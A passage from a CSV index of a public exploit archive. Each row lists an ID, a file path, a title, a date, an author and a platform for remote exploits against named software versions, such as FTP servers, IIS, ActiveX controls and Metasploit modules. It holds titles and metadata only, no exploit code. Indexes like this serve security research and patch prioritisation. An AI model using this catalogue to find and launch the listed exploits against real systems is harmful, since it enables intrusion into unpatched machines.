5.53 - SFTP Authenticated (SEH)",2012-02-27,"Craig Freyman",windows,remote, -18535,exploits/windows/remote/18535.py,"Sysax 5.53 - SSH 'Username' Remote Buffer Overflow Unauthenticated Remote Code Execution (Egghunter)",2012-02-27,"Craig Freyman",windows,remote, -18538,exploits/windows/remote/18538.rb,"ASUS Net4Switch - 'ipswcom.dll' ActiveX Stack Buffer Overflow (Metasploit)",2012-02-29,Metasploit,windows,remote, -18539,exploits/windows/remote/18539.rb,"IBM Personal Communications I-Series Access Workstation 5.9 - Profile (Metasploit)",2012-02-29,Metasploit,windows,remote, -18542,exploits/windows/remote/18542.txt,"Netmechanica NetDecision Traffic Grapher Server - Information Disclosure",2012-02-29,"SecPod Research",windows,remote, -18543,exploits/windows/remote/18543.py,"Netmechanica NetDecision Dashboard Server - Information Disclosure",2012-02-29,"SecPod Research",windows,remote, -18565,exploits/php/remote/18565.rb,"LotusCMS 3.0 - 'eval()' Remote Command Execution (Metasploit)",2012-03-07,Metasploit,php,remote, -18555,exploits/windows/remote/18555.txt,"FlashFXP 4.1.8.1701 - Remote Buffer Overflow",2012-03-03,Vulnerability-Lab,windows,remote, -18557,exploits/windows/remote/18557.rb,"Sysax 5.53 - SSH 'Username' Remote Buffer Overflow (Metasploit)",2012-03-04,Metasploit,windows,remote, -18703,exploits/windows/remote/18703.txt,"Quest Toad for Oracle Explain Plan Display ActiveX Control - 'QExplain2.dll 6.6.1.1115' Remote File Creation / Overwrite (PoC)",2012-04-05,rgod,windows,remote, -18572,exploits/windows/remote/18572.rb,"Adobe Flash Player - '.mp4 cprt' Remote Overflow (Metasploit)",2012-03-08,Metasploit,windows,remote, -18619,exploits/multiple/remote/18619.txt,"Apache Tomcat - Account Scanner / 'PUT' Request Command Execution",2012-03-19,kingcope,multiple,remote, -18604,exploits/windows/remote/18604.rb,"Netmechanica NetDecision HTTP Server 4.5.1 - Remote Buffer Overflow (Metasploit)",2012-03-15,Metasploit,windows,remote, -18610,exploits/windows/remote/18610.pl,"Tiny Server 1.1.5 - Arbitrary File Disclosure",2012-03-16,KaHPeSeSe,windows,remote, -18704,exploits/windows/remote/18704.txt,"Quest vWorkspace 7.5 Connection Broker Client - ActiveX Control 'pnllmcli.dll 7.5.304.547' SaveMiniLaunchFile() Method Remote File Creation / Overwrite (PoC)",2012-04-05,rgod,windows,remote, -18621,exploits/windows/remote/18621.txt,"Dell Webcam Software Bundled - ActiveX Remote Buffer Overflow",2012-03-19,rgod,windows,remote, -18622,exploits/windows/remote/18622.txt,"LANDesk Lenovo ThinkManagement Suite 9.0.3 - Core Server Remote Code Execution",2012-03-19,rgod,windows,remote, -18623,exploits/windows/remote/18623.txt,"LANDesk Lenovo ThinkManagement Suite 9.0.3 Core Server - Arbitrary File Deletion",2012-03-19,rgod,windows,remote, -18624,exploits/windows/remote/18624.txt,"2X Client for RDP 10.1.1204 - ClientSystem Class ActiveX Control Download and Execute",2012-03-19,rgod,windows,remote, -18625,exploits/windows/remote/18625.txt,"2X ApplicationServer 10.1 - TuxSystem Class ActiveX Control Remote File Overwrite",2012-03-19,rgod,windows,remote, -18634,exploits/windows/remote/18634.rb,"Dell Webcam CrazyTalk - ActiveX BackImage (Metasploit)",2012-03-21,Metasploit,windows,remote, -18640,exploits/windows/remote/18640.txt,"Google Talk - 'gtalk://' Deprecated URI Handler Injection",2012-03-22,rgod,windows,remote, -18642,exploits/windows/remote/18642.rb,"Microsoft Internet Explorer - Object Memory Use-After-Free (MS10-002) (Metasploit)",2012-03-22,Metasploit,windows,remote, -18695,exploits/windows/remote/18695.py,"Sysax 5.57 - Directory Traversal",2012-04-03,"Craig Freyman",windows,remote, -18658,exploits/windows/remote/18658.rb,"Ricoh DC Software DL-10 SR10 FTP Server (SR10.exe) - FTP USER Command Buffer Overflow (Metasploit)",2012-03-24,Metasploit,windows,remote, -18666,exploits/windows/remote/18666.rb,"UltraVNC 1.0.2 Client - 'vncviewer.exe' Remote Buffer Overflow (Metasploit)",2012-03-26,Metasploit,windows,remote, -18672,exploits/windows/remote/18672.txt,"Quest InTrust 10.4.x - ReportTree / SimpleTree Classes",2012-03-28,rgod,windows,remote, -18673,exploits/hardware/remote/18673.txt,"D-Link DCS-5605 Network Surveillance - ActiveX Control 'DcsCliCtrl.dll' lstrcpyW Remote Buffer Overflow",2012-03-28,rgod,hardware,remote, -18674,exploits/windows/remote/18674.txt,"Quest InTrust 10.4.x - Annotation Objects ActiveX Control 'AnnotateX.dll' Uninitialized Pointer Remote Code Execution",2012-03-28,rgod,windows,remote, -18675,exploits/hardware/remote/18675.txt,"TRENDnet SecurView TV-IP121WN Wireless Internet Camera - UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow",2012-03-28,rgod,hardware,remote, -18679,exploits/multiple/remote/18679.rb,"Java - AtomicReferenceArray Type Violation (Metasploit)",2012-03-30,Metasploit,multiple,remote, -18683,exploits/windows/remote/18683.py,"MailMax 4.6 - POP3 'USER' Unauthenticated Remote Buffer Overflow",2012-03-30,localh0t,windows,remote, -18709,exploits/windows/remote/18709.rb,"TRENDnet SecurView Internet Camera - UltraMJCam OpenFileDlg Buffer Overflow (Metasploit)",2012-04-06,Metasploit,windows,remote, -18714,exploits/windows/remote/18714.rb,"LANDesk Lenovo ThinkManagement Console - Remote Command Execution (Metasploit)",2012-04-08,Metasploit,windows,remote, -18718,exploits/windows/remote/18718.txt,"Distinct TFTP Server 3.01 - Directory Traversal",2012-04-08,modpr0be,windows,remote, -18723,exploits/multiple/remote/18723.rb,"Snort 2 - DCE/RPC Preprocessor Buffer Overflow (Metasploit)",2012-04-09,Metasploit,multiple,remote, -18727,exploits/windows/remote/18727.rb,"IBM Tivoli Provisioning Manager Express for Software Distribution Isig.isigCtl.1 - ActiveX RunAndUploadFile() Method Overflow (Metasploit)",2012-04-10,Metasploit,windows,remote, -18735,exploits/windows/remote/18735.rb,"Quest InTrust - Annotation Objects Uninitialized Pointer (Metasploit)",2012-04-13,Metasploit,windows,remote, -18738,exploits/php/remote/18738.rb,"V-CMS - Arbitrary '.PHP' File Upload / Execution (Metasploit)",2012-04-14,Metasploit,php,remote, -18759,exploits/windows/remote/18759.rb,"TFTP Server 1.4 - ST WRQ Buffer Overflow (Metasploit)",2012-04-20,Metasploit,windows,remote, -18761,exploits/linux/remote/18761.rb,"Adobe Flash Player - ActionScript Launch Command Execution (Metasploit)",2012-04-20,Metasploit,linux,remote, -18763,exploits/multiple/remote/18763.txt,"Liferay 6.0.x - WebDAV File Reading",2012-04-22,"Jelmer Kuperus",multiple,remote, -18780,exploits/windows/remote/18780.rb,"Microsoft Windows - MSCOMCTL ActiveX Buffer Overflow (MS12-027) (Metasploit)",2012-04-25,Metasploit,windows,remote, -18779,exploits/hardware/remote/18779.txt,"RuggedCom Devices - Backdoor Access",2012-04-24,jc,hardware,remote, -18833,exploits/windows/remote/18833.rb,"SolarWinds Storage Manager 5.1.0 - SQL Injection (Metasploit)",2012-05-04,Metasploit,windows,remote, -18805,exploits/windows/remote/18805.txt,"McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 - ActiveX 'GetObject()' Code Execution",2012-04-30,rgod,windows,remote, -18812,exploits/windows/remote/18812.rb,"McAfee Virtual Technician MVTControl 6.3.0.1911 - GetObject (Metasploit)",2012-05-01,Metasploit,windows,remote, -18818,exploits/windows/remote/18818.py,"SolarWinds Storage Manager 5.1.0 - Remote SYSTEM SQL Injection",2012-05-01,muts,windows,remote, -18825,exploits/windows/remote/18825.rb,"VideoLAN VLC Media Player 2.0.0 - Mms Stream Handling Buffer Overflow (Metasploit)",2012-05-03,Metasploit,windows,remote, -18834,exploits/php/remote/18834.rb,"PHP 5.3.12/5.4.2 - CGI Argument Injection (Metasploit)",2012-05-04,Metasploit,php,remote, -18836,exploits/php/remote/18836.py,"PHP < 5.3.12 / < 5.4.2 - CGI Argument Injection",2012-05-05,rayh4c,php,remote, -18847,exploits/windows/remote/18847.rb,"Mozilla Firefox 7 / 8 < 8.0.1 - nsSVGValue Out-of-Bounds Access (Metasploit)",2012-05-09,Metasploit,windows,remote, -18866,exploits/windows/remote/18866.rb,"Distinct TFTP 3.01 - Writable Directory Traversal Execution (Metasploit)",2012-05-12,Metasploit,windows,remote, -18870,exploits/windows/remote/18870.rb,"Mozilla Firefox 8/9 - 'AttributeChildRemoved()' Use-After-Free (Metasploit)",2012-05-13,Metasploit,windows,remote, -18896,exploits/multiple/remote/18896.rb,"Squiggle 1.7 - SVG Browser Java Code Execution (Metasploit)",2012-05-19,Metasploit,multiple,remote, -18893,exploits/hardware/remote/18893.py,"HP VSA - Remote Command Execution",2012-02-17,"Nicolas Gregoire",hardware,remote, -18898,exploits/php/remote/18898.rb,"Active Collab 'chat module' < 2.3.8 - Remote PHP Code Injection (Metasploit)",2012-05-19,Metasploit,php,remote, -18897,exploits/windows/remote/18897.rb,"Oracle Weblogic Apache Connector - POST Buffer Overflow (Metasploit)",2012-05-19,Metasploit,windows,remote, -18901,exploits/hardware/remote/18901.rb,"HP StorageWorks P4000 - Virtual SAN Appliance Command Execution (Metasploit)",2012-05-21,Metasploit,hardware,remote, -18915,exploits/windows/remote/18915.rb,"FlexNet License Server Manager - lmgrd Buffer Overflow (Metasploit)",2012-05-23,Metasploit,windows,remote, -18929,exploits/windows/remote/18929.rb,"RabidHamster R4 - Log Entry 'sprintf()' Remote Buffer Overflow (Metasploit)",2012-05-25,Metasploit,windows,remote, -18933,exploits/windows/remote/18933.rb,"quickshare file share 1.2.1 - Directory Traversal (Metasploit) (2)",2012-05-27,Metasploit,windows,remote, -18942,exploits/linux/remote/18942.rb,"Symantec Web Gateway 5.0.2.8 - Command Execution (Metasploit)",2012-05-28,Metasploit,linux,remote, -19025,exploits/windows/remote/19025.rb,"Sielco Sistemi Winlog 2.07.14 - Remote Buffer Overflow (Metasploit)",2012-06-08,Metasploit,windows,remote, -18967,exploits/windows/remote/18967.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020004 Buffer Overflow (Metasploit)",2012-06-01,Metasploit,windows,remote, -18968,exploits/windows/remote/18968.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020006 Buffer Overflow (Metasploit)",2012-06-01,Metasploit,windows,remote, -18969,exploits/windows/remote/18969.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020002 Buffer Overflow (Metasploit)",2012-06-01,Metasploit,windows,remote, -18973,exploits/windows/remote/18973.rb,"GIMP script-fu - Server Buffer Overflow (Metasploit)",2012-06-02,Metasploit,windows,remote, -18986,exploits/windows/remote/18986.rb,"Sielco Sistemi Winlog 2.07.16 - Remote Buffer Overflow",2012-06-05,m-1-k-3,windows,remote, -19027,exploits/windows/remote/19027.rb,"Samsung NET-i viewer - Multiple ActiveX 'BackupToAvi()' Remote Overflows (Metasploit)",2012-06-08,Metasploit,windows,remote, -19026,exploits/windows/remote/19026.rb,"Microsoft IIS - MDAC 'msadcs.dll' RDS DataStub Content-Type Overflow (MS02-065) (Metasploit)",2012-06-08,Metasploit,windows,remote, -19002,exploits/windows/remote/19002.rb,"Microsoft Windows - OLE Object File Handling Remote Code Execution (Metasploit)",2012-06-06,Metasploit,windows,remote, -19030,exploits/windows/remote/19030.rb,"Tom Sawyer Software GET Extension Factory - Remote Code Execution (Metasploit)",2012-06-10,Metasploit,windows,remote, -19028,exploits/linux/remote/19028.txt,"Berkeley Sendmail 5.58 - Debug",1988-08-01,anonymous,linux,remote, -19033,exploits/windows/remote/19033.txt,"Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities",2012-06-10,kingcope,windows,remote, -19039,exploits/bsd/remote/19039.txt,"BSD 4.2 - 'fingerd' Remote Buffer Overflow",1988-10-01,anonymous,bsd,remote, -19040,exploits/solaris/remote/19040.txt,"SunView (SunOS 4.1.1) - 'selection_svc' Remote File Read",1990-08-14,"Peter Shipley",solaris,remote, -19044,exploits/solaris/remote/19044.txt,"SunOS 4.1.3 - LD_LIBRARY_PATH / LD_OPTIONS",1992-05-27,anonymous,solaris,remote, -19047,exploits/aix/remote/19047.txt,"Stalker Internet Mail Server 1.6 - Remote Buffer Overflow",2001-09-12,"David Luyer",aix,remote, -19048,exploits/aix/remote/19048.txt,"IRIX 6.4 - 'pfdisplay.cgi' Code Execution",1998-04-07,"J.A. Gutierrez",aix,remote, -19069,exploits/linux/remote/19069.txt,"Qualcomm Eudora Internet Mail Server 1.2 - Remote Buffer Overflow",1998-04-14,"Netstat Webmaster",linux,remote, -19079,exploits/linux/remote/19079.c,"id Software Solaris Quake II 3.13/3.14 / QuakeWorld 2.0/2.1 / Quake 1.9/3.13/3.14 - Command Execution",1998-05-01,"Mark Zielinski",linux,remote, -19081,exploits/multiple/remote/19081.txt,"Lynx 2.8 - Remote Buffer Overflow",1998-05-03,"Michal Zalewski",multiple,remote, -19083,exploits/windows/remote/19083.cpp,"Cheyenne Inoculan for Windows NT 4.0 - Share",1998-06-10,"Paul Boyer",windows,remote, -19084,exploits/multiple/remote/19084.txt,"Metainfo Sendmail 2.0/2.5 / MetaIP 3.1 - Upload / Execute Read Scripts",1998-06-30,"Jeff Forristal",multiple,remote, -19086,exploits/linux/remote/19086.c,"WU-FTPD 2.4.2 / SCO Open Server 5.0.5 / ProFTPd 1.2 pre1 - 'realpath' Remote Buffer Overflow (1)",1999-02-09,"smiler & cossack",linux,remote,21 -19087,exploits/linux/remote/19087.c,"WU-FTPD 2.4.2 / SCO Open Server 5.0.5 / ProFTPd 1.2 pre1 - 'realpath' Remote Buffer Overflow (2)",1999-02-09,"jamez & c0nd0r",linux,remote,21 -19091,exploits/hardware/remote/19091.py,"F5 BIG-IP - Authentication Bypass",2012-06-12,"David Kennedy (ReL1K)",hardware,remote, -19092,exploits/multiple/remote/19092.py,"MySQL - Authentication Bypass",2012-06-12,"David Kennedy (ReL1K)",multiple,remote, -19093,exploits/multiple/remote/19093.txt,"Allaire ColdFusion Server 4.0 - Remote File Display / Deletion / Upload / Execution",1998-12-25,rain.forest.puppy,multiple,remote, -19094,exploits/windows/remote/19094.txt,"Microsoft Internet Explorer 4/5 - DHTML Edit ActiveX Control File Stealing / Cross Frame Access",1999-04-22,"Georgi Guninsky",windows,remote, -19096,exploits/linux/remote/19096.c,"RedHat Linux 5.1 / Caldera OpenLinux Standard 1.2 - Mountd",1998-08-28,LucySoft,linux,remote, -19099,exploits/hardware/remote/19099.rb,"F5 BIG-IP - SSH Private Key Exposure (Metasploit)",2012-06-13,Metasploit,hardware,remote, -19101,exploits/unix/remote/19101.c,"Xi Graphics Maximum CDE 1.2.3/TriTeal TED CDE 4.3/Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (1)",1998-08-31,"NAI research team",unix,remote, -19102,exploits/unix/remote/19102.c,"Xi Graphics Maximum CDE 1.2.3/TriTeal TED CDE 4.3/Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (2)",1998-08-31,"NAI research team",unix,remote, -40434,exploits/php/remote/40434.rb,"FreePBX < 13.0.188 - Remote Command Execution (Metasploit)",2016-09-27,0x4148,php,remote, -19104,exploits/linux/remote/19104.c,"IBM AIX 3.2/4.1 / SCO Unixware 7.1.1 / SGI IRIX 5.3 / Sun Solaris 2.5.1 - Privilege Escalation",1997-11-24,anonymous,linux,remote, -19105,exploits/linux/remote/19105.c,"Muhammad A. Muquit wwwcount 2.3 - 'Count.cgi' Remote Buffer Overflow",1997-10-16,"Razvan Dragomirescu",linux,remote, -19107,exploits/linux/remote/19107.c,"Netscape Messaging Server 3.55 & University of Washington imapd 10.234 - Remote Buffer Overflow",1998-07-17,anonymous,linux,remote, -19109,exploits/linux/remote/19109.c,"Qualcomm qpopper 2.4 - POP Server Buffer Overflow (1)",1998-06-27,"Seth McGann",linux,remote, -19110,exploits/unix/remote/19110.c,"Qualcomm qpopper 2.4 - POP Server Buffer Overflow (2)",1998-06-27,"Miroslaw Grzybek",unix,remote, -19111,exploits/linux/remote/19111.c,"ISC BIND (Linux/BSD) - Remote Buffer Overflow (1)",1998-04-08,ROTShB,linux,remote, -19112,exploits/linux/remote/19112.c,"ISC BIND (Multiple OSes) - Remote Buffer Overflow (2)",1998-04-08,prym,linux,remote, -19113,exploits/windows/remote/19113.txt,"Microsoft Windows NT 3.5.1 SP2/3.5.1 SP3/3.5.1 SP4/3.5.1 SP5/4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - TelnetD",1999-01-02,"Tomas Halgas",windows,remote,23 -19118,exploits/multiple/remote/19118.txt,"Microsoft IIS 3.0/4.0 / Microsoft Personal Web Server 2.0/3.0/4.0 - ASP Alternate Data Streams",1998-01-01,"Paul Ashton",multiple,remote, -19119,exploits/linux/remote/19119.c,"HP HP-UX 10.34 rlpdaemon - Remote Overflow",1998-07-06,"RSI Advise",linux,remote, -19120,exploits/multiple/remote/19120.txt,"Ralf S. Engelschall ePerl 2.2.12 - Handling of ISINDEX Query",1998-07-06,"Luz Pinto",multiple,remote, -19121,exploits/multiple/remote/19121.txt,"Ray Chan WWW Authorization Gateway 0.1 - Command Execution",1998-07-08,"Albert Nubdy",multiple,remote, -19123,exploits/linux/remote/19123.c,"SCO Open Server 5.0.4 - POP Server Buffer Overflow",1998-07-13,"Vit Andrusevich",linux,remote, -19124,exploits/linux/remote/19124.txt,"HP JetAdmin 1.0.9 Rev. D - symlink",1998-07-15,emffmmadffsdf,linux,remote, -19127,exploits/multiple/remote/19127.txt,"Verity Search97 2.1 - Security",1998-07-14,"Stefan Arentz",multiple,remote, -19129,exploits/multiple/remote/19129.txt,"Microsoft IIS 4.0 / Microsoft Site Server 3.0 - Showcode ASP",1999-05-07,L0pht,multiple,remote, -19131,exploits/windows/remote/19131.py,"XM Easy Personal FTP Server 5.30 - Remote Format String Write4",2012-06-14,mr_me,windows,remote, -19141,exploits/windows/remote/19141.rb,"Microsoft Internet Explorer - Same ID Property Deleted Object Handling Memory Corruption (MS12-037) (Metasploit)",2012-06-14,Metasploit,windows,remote, -19147,exploits/windows/remote/19147.txt,"Microsoft IIS 4 (Windows NT) - Remote Web-Based Administration",1999-01-14,Mnemonix,windows,remote, -19149,exploits/windows/remote/19149.c,"Microsoft IIS 4 (Windows NT) - Log Avoidance",1999-01-22,Mnemonix,windows,remote, -19152,exploits/windows/remote/19152.txt,"Microsoft IIS 5.0 - IISAPI Extension Enumerate Root Web Server Directory",1999-01-26,Mnemonix,windows,remote, -19387,exploits/windows/remote/19387.rb,"Apple iTunes 10 - Extended M3U Stack Buffer Overflow (Metasploit)",2012-06-25,Metasploit,windows,remote, -19156,exploits/windows/remote/19156.txt,"Microsoft Internet Explorer 5.0.1 - Invalid Byte Cross-Frame Access",1999-01-28,"Georgi Guninski",windows,remote, -19402,exploits/hardware/remote/19402.txt,"Western Digital's WD TV Live SMP/Hub - Privilege Escalation",2012-06-26,"Wolfgang Borst",hardware,remote, -19164,exploits/windows/remote/19164.txt,"Microsoft Internet Explorer 4 - Clipboard Paste",1999-01-21,"Juan Carlos Garcia Cuartango",windows,remote, -19177,exploits/windows/remote/19177.rb,"ComSndFTP 1.3.7 Beta - USER Format String (Write4) (Metasploit)",2012-06-15,Metasploit,windows,remote, -19186,exploits/windows/remote/19186.rb,"Microsoft XML Core Services - MSXML Uninitialized Memory Corruption (MS12-043) (Metasploit)",2012-06-16,Metasploit,windows,remote, -19193,exploits/multiple/remote/19193.txt,"Allaire Forums 2.0.4 - Getfile",1999-02-11,"Cameron Childress",multiple,remote, -19194,exploits/multiple/remote/19194.txt,"Microsoft IIS 3.0/4.0 - Using ASP and FSO To Read Server Files",1999-02-11,"Gary Geisbert",multiple,remote, -19197,exploits/windows/remote/19197.txt,"Microsoft Windows NT 4.0 SP5 / Terminal Server 4.0 - 'Pass the Hash' with Modified SMB Client",1997-04-08,"Paul Ashton",windows,remote, -19208,exploits/windows/remote/19208.txt,"Microsoft Site Server Commerce Edition 3.0 alpha - AdSamples Sensitive Information",1999-05-11,"Andrey Kruchkov",windows,remote, -19218,exploits/linux/remote/19218.c,"Cat Soft Serv-U FTP Server 2.5 - Remote Buffer Overflow",1999-05-03,"Arne Vidstrom",linux,remote, -19219,exploits/linux/remote/19219.c,"BisonWare BisohFTP Server 3.5 - Multiple Vulnerabilities",1999-05-17,"Arne Vidstrom",linux,remote, -19221,exploits/multiple/remote/19221.txt,"SmartDesk WebSuite 2.1 - Remote Buffer Overflow",1999-05-25,cmart,multiple,remote, -19222,exploits/multiple/remote/19222.txt,"Gordano NTMail 4.2 - Web File Access",1999-05-25,Marc,multiple,remote, -19223,exploits/multiple/remote/19223.txt,"FloosieTek FTGate 2.1 - Web File Access",1999-05-25,Marc,multiple,remote, -19224,exploits/windows/remote/19224.c,"Computalynx CMail 2.3 - Web File Access",1999-05-25,Marc,windows,remote, -19226,exploits/linux/remote/19226.c,"University of Washington pop2d 4.4 - Remote Buffer Overflow",1999-05-26,"Chris Evans",linux,remote, -19231,exploits/windows/remote/19231.rb,"PHP 5.4.3 - apache_request_headers Function Buffer Overflow (Metasploit)",2012-06-17,Metasploit,windows,remote, -19236,exploits/solaris/remote/19236.txt,"Solaris 7.0 - 'Coredump' File Write",1996-08-03,"Jungseok Roh",solaris,remote, -19237,exploits/aix/remote/19237.txt,"Gordano NTMail 3.0/5.0 - SPAM Relay",1999-06-08,Geo,aix,remote, -19239,exploits/windows/remote/19239.txt,"Microsoft IIS (Windows NT 4.0/SP1/SP2/SP3/SP4/SP5) - '.IDC' Path Mapping",1999-06-04,"Scott Danahy",windows,remote, -19242,exploits/multiple/remote/19242.txt,"CdomainFree 2.4 - Remote Command Execution",1999-06-01,"Salvatore Sanfilippo -antirez-",multiple,remote, -19245,exploits/windows/remote/19245.pl,"Microsoft IIS 4.0 - Remote Buffer Overflow (1)",1999-06-15,"eEye Digital Security Team",windows,remote, -19246,exploits/windows/remote/19246.pm,"Microsoft IIS 4.0 - Remote Buffer Overflow (2)",1999-06-15,Stinko,windows,remote, -19247,exploits/linux/remote/19247.c,"Microsoft IIS 4.0 - Remote Buffer Overflow (3)",1999-06-15,"eeye security",linux,remote, -19248,exploits/windows/remote/19248.c,"Microsoft IIS 4.0 - Remote Buffer Overflow (4)",1999-06-15,"Greg Hoglund",windows,remote, -19251,exploits/linux/remote/19251.c,"tcpdump 3.4 - Protocol Four / Zero Header Length",1999-06-16,badi,linux,remote, -19253,exploits/linux/remote/19253.txt,"Debian 2.1 - httpd",1999-06-17,anonymous,linux,remote, -19266,exploits/windows/remote/19266.py,"EZHomeTech Ezserver 6.4 - Remote Stack Overflow",2012-06-18,modpr0be,windows,remote, -19288,exploits/windows/remote/19288.py,"HP Data Protector Client - EXEC_CMD Remote Code Execution",2012-06-19,"Ben Turner",windows,remote, -19291,exploits/windows/remote/19291.rb,"EZHomeTech EzServer 6.4.017 - Remote Stack Buffer Overflow (Metasploit)",2012-06-19,Metasploit,windows,remote, -19295,exploits/windows/remote/19295.rb,"Adobe Flash Player - AVM Verification Logic Array Indexing Code Execution (Metasploit)",2012-06-20,Metasploit,windows,remote, -19601,exploits/windows/remote/19601.txt,"etype eserv 2.50 - Directory Traversal",1999-11-04,"Ussr Labs",windows,remote, -19297,exploits/linux/remote/19297.c,"IBM Scalable POWERparallel (SP) 2.0 - 'sdrd' File Read",1998-08-05,"Chuck Athey & Jim Garlick",linux,remote, -19298,exploits/multiple/remote/19298.txt,"SGI IRIX 6.2 - cgi-bin wrap",1997-04-19,"J.A. Gutierrez",multiple,remote, -19299,exploits/multiple/remote/19299.txt,"SGI IRIX 6.3 - cgi-bin 'webdist.cgi' Command Execution",1997-05-06,anonymous,multiple,remote, -19303,exploits/multiple/remote/19303.txt,"SGI IRIX 6.4 - cgi-bin handler",1997-06-16,"Razvan Dragomirescu",multiple,remote, -19316,exploits/irix/remote/19316.c,"SGI IRIX 6.5.2 - 'nsd' Information Gathering",1999-05-31,"Jefferson Ogata",irix,remote, -19322,exploits/windows/remote/19322.rb,"Apple iTunes 10.6.1.7 - Extended m3u Stack Buffer Overflow (Metasploit)",2012-06-21,Rh0,windows,remote, -19327,exploits/solaris/remote/19327.c,"Sun Solaris 2.5.1 - rpc.statd rpc Call Relaying",1999-06-07,anonymous,solaris,remote, -19348,exploits/aix/remote/19348.txt,"IBM AIX 3.2.5 - 'login(1)' Privilege Escalation",1996-12-04,anonymous,aix,remote, -19407,exploits/windows/remote/19407.py,"Symantec pcAnywhere 12.5.0 - 'Login' / 'Password' Remote Buffer Overflow",2012-06-27,"S2 Crew",windows,remote, -19361,exploits/windows/remote/19361.txt,"Microsoft IIS 3.0/4.0 - Double Byte Code Page",1999-06-24,Microsoft,windows,remote, -19363,exploits/multiple/remote/19363.txt,"Netscape FastTrack Server 3.0.1 - Fasttrack Root Directory Listing",1999-06-07,"Jesús López de Aguileta",multiple,remote, -19365,exploits/netware/remote/19365.txt,"Novell Netware 4.1/4.11 - SP5B NDS Default Rights",1999-04-09,"Simple Nomad",netware,remote, -19369,exploits/windows/remote/19369.rb,"Adobe Flash Player - Object Type Confusion (Metasploit)",2012-06-25,Metasploit,windows,remote, -19383,exploits/multiple/remote/19383.txt,"Qbik WinGate Standard 3.0.5 - Log Service Directory Traversal",1999-02-22,eEYe,multiple,remote, -19420,exploits/multiple/remote/19420.c,"Caldera OpenUnix 8.0/UnixWare 7.1.1 / HP HP-UX 11.0 / Solaris 7.0 / SunOS 4.1.4 - rpc.cmsd Buffer Overflow (1)",1999-07-13,"Last Stage of Delirium",multiple,remote, -19421,exploits/multiple/remote/19421.c,"Caldera OpenUnix 8.0/UnixWare 7.1.1 / HP HP-UX 11.0 / Solaris 7.0 / SunOS 4.1.4 - rpc.cmsd Buffer Overflow (2)",1999-07-13,jGgM,multiple,remote, -19424,exploits/windows/remote/19424.pl,"Microsoft Data Access Components (MDAC) 2.1 / Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 / Microsoft Site Server Commerce Edition 3.0 i386 MDAC - RDS (1)",1999-07-19,"rain forest puppy",windows,remote, -19426,exploits/multiple/remote/19426.c,"SGI Advanced Linux Environment 3.0 / SGI IRIX 6.5.4 / SGI UNICOS 10.0 6 - arrayd.auth Default Configuration",1999-07-19,"Last Stage of Delirium",multiple,remote, -19435,exploits/windows/remote/19435.html,"Microsoft JET 3.5/3.51/4.0 - VBA Shell",1999-07-29,BrootForce,windows,remote, -19442,exploits/windows/remote/19442.html,"Compaq Java Applet for Presario SpawnApp - Code Execution",1998-11-28,"Frank Farance",windows,remote, -19443,exploits/multiple/remote/19443.txt,"Netscape Enterprise Server 3.51/3.6 - JHTML View Source",1999-07-30,"David Litchfield",multiple,remote, -19444,exploits/hardware/remote/19444.txt,"Network Security Wizards Dragon-Fire IDS 1.0 - Command Execution",1999-08-05,"Stefan Lauda",hardware,remote, -19448,exploits/windows/remote/19448.c,"ToxSoft NextFTP 1.82 - Remote Buffer Overflow",1999-08-03,UNYUN,windows,remote, -19449,exploits/windows/remote/19449.c,"Fujitsu Chocoa 1.0 beta7R - 'Topic' Remote Buffer Overflow",1999-08-03,UNYUN,windows,remote, -19450,exploits/windows/remote/19450.c,"CREAR ALMail32 1.10 - Remote Buffer Overflow",1999-08-08,UNYUN,windows,remote, -19451,exploits/multiple/remote/19451.txt,"Microsoft Windows 98a/98b/98SE / Solaris 2.6 - IRDP",1999-08-11,L0pth,multiple,remote, -19458,exploits/linux/remote/19458.c,"Linux Kernel 2.0.30/2.0.35/2.0.36/2.0.37 - Blind TCP Spoofing",1999-07-31,Nergal,linux,remote, -19459,exploits/multiple/remote/19459.txt,"Hybrid Ircd 5.0.3 p7 - Remote Buffer Overflow",1999-08-13,"jduck & stranjer",multiple,remote, -19466,exploits/multiple/remote/19466.txt,"Hughes Technologies Mini SQL (mSQL) 2.0/2.0.10 - Information Disclosure",1999-08-18,"Gregory Duchemin",multiple,remote, -19468,exploits/windows/remote/19468.txt,"Microsoft Internet Explorer 5 - ActiveX Object For Constructing Type Libraries For Scriptlets File Write",1999-08-21,"Georgi Guninski",windows,remote, -19475,exploits/linux/remote/19475.c,"ProFTPd 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (1)",1999-08-17,"babcia padlina ltd",linux,remote, -19476,exploits/linux/remote/19476.c,"ProFTPd 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (2)",1999-08-27,anonymous,linux,remote, -19478,exploits/unix/remote/19478.c,"BSD/OS 3.1/4.0.1 / FreeBSD 3.0/3.1/3.2 / RedHat Linux 6.0 - 'amd' Remote Buffer Overflow (1)",1999-08-31,Taeho,unix,remote, -19479,exploits/unix/remote/19479.c,"BSD/OS 3.1/4.0.1 / FreeBSD 3.0/3.1/3.2 / RedHat Linux 6.0 - 'amd' Remote Buffer Overflow (2)",1999-08-30,c0nd0r,unix,remote, -19484,exploits/windows/remote/19484.rb,"HP Data Protector - Create New Folder Buffer Overflow (Metasploit)",2012-07-01,Metasploit,windows,remote,3817 -19486,exploits/windows/remote/19486.c,"Netscape Communicator 4.06/4.5/4.6/4.51/4.61 - EMBED Buffer Overflow",1999-09-02,"R00t Zer0",windows,remote, -19487,exploits/windows/remote/19487.txt,"Microsoft Internet Explorer 4/5 - ActiveX 'Eyedog' Remote Overflow",1999-08-21,"Shane Hird's",windows,remote, -19490,exploits/windows/remote/19490.txt,"Microsoft Internet Explorer 4.0.1/5 - Import/Export Favorites",1999-09-10,"Georgi Guninski",windows,remote, -19491,exploits/windows/remote/19491.txt,"BindView HackerShield 1.0/1.1 - HackerShield AgentAdmin Password",1999-09-10,anonymous,windows,remote, -19492,exploits/multiple/remote/19492.txt,"Microsoft Internet 